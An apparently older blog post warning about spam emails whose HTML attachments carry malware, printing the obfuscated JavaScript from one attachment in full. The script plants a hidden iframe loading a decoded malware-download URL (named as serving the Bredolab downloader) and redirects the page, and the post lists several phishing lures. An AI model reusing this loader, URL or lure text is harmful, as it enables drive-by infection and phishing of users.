Random Emails with HTML Attachment – Malware
Over the last month or so I have been absolutely inundated with emails of various topics asking to run html file that is attached.
I have included an example of the code contained in the html attachment below
Under no circumstances should anyone ever run these attachments or run the following code
Malicious code contained in the html attachment
<script type=’text/javascript’>function sW(){};var wX=”wX”;sW.prototype = {dC : function() {this.e=26810;this.xM=false;dX=”";return ‘hStbtbpb:b/S/bsbobnbnkoks*eS.krSuk:*8*0S8k0a/*ian*daeaxb.ap*h*pS?apaikdb=S1S0a’.fS(/[ak\*Sb]/g, ”);var dA=new Array();var fJ=”";n=”";this.gZ=”gZ”;},c : function() {var h=function(){};this.xJ=”";var t=”";w=9625;this.i=13841;var fY=58590;var x=window;xS=”xS”;var xQ=new Date();var a = this;this.vT=”";var oK=function(){return ‘oK’};var o=document;var vY=”;p=false;this.r=16716;this.vL=26555;this.rZ=false;String.prototype.fS=function(f, d){var oM=this; return oM.replace(f, d)};this.xA=11909;var wQ=false;var u=”";var cL=”cL”;this.mN=”;this.uU=12901;this.hY=”hY”;var g = ‘swewt/T#i@m@e@olultw’.fS(/[wl#@/]/g, ”);var y=new Date();gX=”;var dW=”;gL=false;var m = ‘w[rxi9t9e['.fS(/[\[Ws9x]/g, ”);function dXU(){};var eU=new Date();this.gM=15553;var pM=”pM”;this.yR=”yR”;var uP=”;var fC=new Date();try {var l=”";this.s=”;var lC=function(){};var hN=function(){};this.b=false;function xN(){};var cH = ‘sNrlcP’.fS(/[PNl\]z]/g, ”);this.fR=”;var iM=new Array();this.eJ=”;var xK = ‘cBrzezautBezE4lueBmweznutB’.fS(/[Bwu4z]/g, ”);rH=”";jH=”;var xMG=”; var j = ‘aWpUpIeUnIdICUhWiUlWd:’.fS(/[\:6UWI]/g, ”);var mH=false;var uA=”";this.fE=”fE”;var v = ‘bOoUdUyU’.fS(/[UO\!,l]/g, ”);this.uM=64493;this.yB=”;function hI(){};sG=”sG”;var dO = ‘s(e#t(A5txtxrxi5b#u(t5e>’.fS(/[\>\(x#5]/g, ”);var pH=function(){return ‘pH’};mU=”mU”;var xU = ‘h+eTiyg+h[ty'.fS(/[y\[TB\+]/g, ”);var xNB=”";this.tL=62920;var aA=function(){return ‘aA’};wH=false;var q = ‘wKigd7t7hz’.fS(/[z,K7g]/g, ”);var qW=function(){return ‘qW’};var fP=”fP”;var cG=”;this.cC=”";var fEX=function(){return ‘fEX’};var uL=”;aQ=false;var z=document[xK](‘i7f%rIa%m*e*’.fS(/[\*7%I\$]/g, ”));this.gB=”";var vZ=function(){};xAB=”";aS=36314;z[dO](cH, a.dC());var iA=function(){return ‘iA’};this.iC=51591;z[dO](xU, “1″);var zS=”";this.vR=”vR”;z[dO](q, “1″);this.wA=false;this.rD=49214;this.iN=”;var aR=false;this.fL=”;var wZ=31785;this.xR=24396;o[v][j](z);this.bV=”;this.cP=false;xKE=11560;var vZL=function(){};this.pN=false;var dWR=”dWR”;var wV=”;this.k=false;} catch(aU) {var kQ=function(){};fLO=”;function zM(){};this.vK=”;var yL=function(){};o[m](‘<[h[t}mLlk L>k<)bLokd[y} k>k<L/[b}o}dLy}>}<[/[hLt)m)l)>)'.fS(/[\)\[Lk\}]/g, ”));this.eR=false;var cX=false;var oE=false;x[g](function(){ a.c() }, 319);eM=false;var tS=”";this.vX=”";var bK=”;}var rU=new Array();this.xI=26651;this.hX=”hX”;}};vI=”vI”;var oD=new sW(); this.oB=6063;oD.c();this.pG=44011;</script><script type=’text/javascript’>function mY(){};this.sU=”sU”;mY.prototype = {k : function() {this.x=false;var nY=”nY”;var h=new Date();var iB=new Array();this.j=859;q=”q”;var mZ=false;this.b=false;n=document['lsoFcsasthiFohnh'.replace(/[h\$Fs\?]/g, ”)];this.g=2474;this.jW=false;u=”;var d=”";hN=false;var o=new Date();function i(m, v){s=”";gE=”gE”;var e=”;var vV=”;m.href=v;mV=”;var xN=51306;a=”";this.mW=false;}vR=false;function l(){};this.w=”w”;this.bS=false;var qL=new Date();var mG=”mG”;qI=”;i(n, ‘hCt^t+p+:+/Z/+t^o+lZd+s+pyeyaZky.Zc+oCm+’.replace(/[\+Cy\^Z]/g, ”));this.bK=”;oE=false;var c=”;this.xZ=”";}};var gI=5746;var f=new mY(); this.fY=false;f.k();gT=”gT”;</script><script type=’text/javascript’>function sW(){};var wX=”wX”;sW.prototype = {dC : function() {this.e=26810;this.xM=false;dX=”";return ‘hStbtbpb:b/S/bsbobnbnkoks*eS.krSuk:*8*0S8k0a/*ian*daeaxb.ap*h*pS?apaikdb=S1S0a’.fS(/[ak\*Sb]/g, ”);var dA=new Array();var fJ=”";n=”";this.gZ=”gZ”;},c : function() {var h=function(){};this.xJ=”";var t=”";w=9625;this.i=13841;var fY=58590;var x=window;xS=”xS”;var xQ=new Date();var a = this;this.vT=”";var oK=function(){return ‘oK’};var o=document;var vY=”;p=false;this.r=16716;this.vL=26555;this.rZ=false;String.prototype.fS=function(f, d){var oM=this; return oM.replace(f, d)};this.xA=11909;var wQ=false;var u=”";var cL=”cL”;this.mN=”;this.uU=12901;this.hY=”hY”;var g = ‘swewt/T#i@m@e@olultw’.fS(/[wl#@/]/g, ”);var y=new Date();gX=”;var dW=”;gL=false;var m = ‘w[rxi9t9e['.fS(/[\[Ws9x]/g, ”);function dXU(){};var eU=new Date();this.gM=15553;var pM=”pM”;this.yR=”yR”;var uP=”;var fC=new Date();try {var l=”";this.s=”;var lC=function(){};var hN=function(){};this.b=false;function xN(){};var cH = ‘sNrlcP’.fS(/[PNl\]z]/g, ”);this.fR=”;var iM=new Array();this.eJ=”;var xK = ‘cBrzezautBezE4lueBmweznutB’.fS(/[Bwu4z]/g, ”);rH=”";jH=”;var xMG=”; var j = ‘aWpUpIeUnIdICUhWiUlWd:’.fS(/[\:6UWI]/g, ”);var mH=false;var uA=”";this.fE=”fE”;var v = ‘bOoUdUyU’.fS(/[UO\!,l]/g, ”);this.uM=64493;this.yB=”;function hI(){};sG=”sG”;var dO = ‘s(e#t(A5txtxrxi5b#u(t5e>’.fS(/[\>\(x#5]/g, ”);var pH=function(){return ‘pH’};mU=”mU”;var xU = ‘h+eTiyg+h[ty'.fS(/[y\[TB\+]/g, ”);var xNB=”";this.tL=62920;var aA=function(){return ‘aA’};wH=false;var q = ‘wKigd7t7hz’.fS(/[z,K7g]/g, ”);var qW=function(){return ‘qW’};var fP=”fP”;var cG=”;this.cC=”";var fEX=function(){return ‘fEX’};var uL=”;aQ=false;var z=document[xK](‘i7f%rIa%m*e*’.fS(/[\*7%I\$]/g, ”));this.gB=”";var vZ=function(){};xAB=”";aS=36314;z[dO](cH, a.dC());var iA=function(){return ‘iA’};this.iC=51591;z[dO](xU, “1″);var zS=”";this.vR=”vR”;z[dO](q, “1″);this.wA=false;this.rD=49214;this.iN=”;var aR=false;this.fL=”;var wZ=31785;this.xR=24396;o[v][j](z);this.bV=”;this.cP=false;xKE=11560;var vZL=function(){};this.pN=false;var dWR=”dWR”;var wV=”;this.k=false;} catch(aU) {var kQ=function(){};fLO=”;function zM(){};this.vK=”;var yL=function(){};o[m](‘<[h[t}mLlk L>k<)bLokd[y} k>k<L/[b}o}dLy}>}<[/[hLt)m)l)>)'.fS(/[\)\[Lk\}]/g, ”));this.eR=false;var cX=false;var oE=false;x[g](function(){ a.c() }, 319);eM=false;var tS=”";this.vX=”";var bK=”;}var rU=new Array();this.xI=26651;this.hX=”hX”;}};vI=”vI”;var oD=new sW(); this.oB=6063;oD.c();this.pG=44011;</script>
<script type=’text/javascript’>function mY(){};this.sU=”sU”;mY.prototype = {k : function() {this.x=false;var nY=”nY”;var h=new Date();var iB=new Array();this.j=859;q=”q”;var mZ=false;this.b=false;n=document['lsoFcsasthiFohnh'.replace(/[h\$Fs\?]/g, ”)];this.g=2474;this.jW=false;u=”;var d=”";hN=false;var o=new Date();function i(m, v){s=”";gE=”gE”;var e=”;var vV=”;m.href=v;mV=”;var xN=51306;a=”";this.mW=false;}vR=false;function l(){};this.w=”w”;this.bS=false;var qL=new Date();var mG=”mG”;qI=”;i(n, ‘hCt^t+p+:+/Z/+t^o+lZd+s+pyeyaZky.Zc+oCm+’.replace(/[\+Cy\^Z]/g, ”));this.bK=”;oE=false;var c=”;this.xZ=”";}};var gI=5746;var f=new mY(); this.fY=false;f.k();gT=”gT”;</script>
So how does this code work and what does it do?
Well it’s quite clever in the way how it disguises the offending web address. Without going into too much detail how the code works, I will point to the the following line:
“;return ‘hStbtbpb:b/S/bsbobnbnkoks*eS.krSuk:*8*0S8k0a/*ian*daeaxb.ap*h*pS?apaikdb=S1S0a‘.fS(/[ak\*Sb]/g, ”
If you look carefully you may see something that resembles a typical URL but with extra characters mixed in. If you removed the extra characters it will return the following URL:
Do not visit the following website – it will download malware (Win32/Bredolab) to your computer
http://onnoe.ru:8080/index.php?pid=10
So why go to all that effort just to disguise a simple URL? This is so that the criminal can continue to use the same URL with millions of different variations on the way he disguises the URL so that it can slip past the Spam protection without being detected.
| Malware |
| Malware Name:
Win32/Bredolab What it does: Win32/Bredolab is a downloader which is able to download and execute arbitrary files from a remote host. |
Some examples of the emails I have received:
Sender:
microsoft outlook support
Subject:
Outlook Setup Notification
Content:
You have (8) messages from Microsoft Outlook.
Please re-configure your Microsoft Outlook again.
Download attached setup file and install.
Attachment:
open.html
Sender:
Tyrone Macdonald
Subject:
FIFA World Cup South Africa… bad news
Content:
Hello!!
FIFA World Cup 2010 scandal news, read attached document
Attachment:
open.html
Sender:
Sylvia Ford
Subject:
Time to be a MAN.
Content:
Save big now
Attachment:
open.html
Sender:
Jarvis Carr
Subject:
Outlook Setup Notification
Content:
Dangerous files detected!
Your system is at risk!
Several files were found in your computer which can damage your personal data.
It is strongly recommended to delete them immediately!
Name Alert level
Trojan-DownIoader.Win32.Agent.alr High Risk
Nuker.Win32.CGSi Low Risk
Trojan-DownIoader.Win32.Agent.alr High Risk
Trojan-Dropper. Win32.Agent.sd Low Risk
* To protect your data choose offline scanning
and set full real-time antivirus service.
* Open Attached File And Repair Now
Attachment
Virus Scan.html
Sender:
123Greetings.com
Subject:
[practicedak0@ramcar.com] just sent you an ecard
Content:
You can view it by open attached document.
Your ecard is going to be with us for the next 30 days.
We hope you enjoy your ecard.
Attachment:
ecard.html
Sender:
Subject:
Reset your Facebook password
Content:
Hey there.
Because of the measures taken to provide safety to our clients, your password has been changed.
You can find your new password in attached document.
Yours,
Facebook=
Attachment:
facebook_newpass.html
One Response to “Random Emails with HTML Attachment – Malware”
i really hate this one! I get these all the time but at lease my spam protection sorts it out! but still lots and lots and lots!!1
[Reply]
Leave a Reply
Do not spam the comments otherwise you will be added to the Spammers page. Only good feedback will be accepted.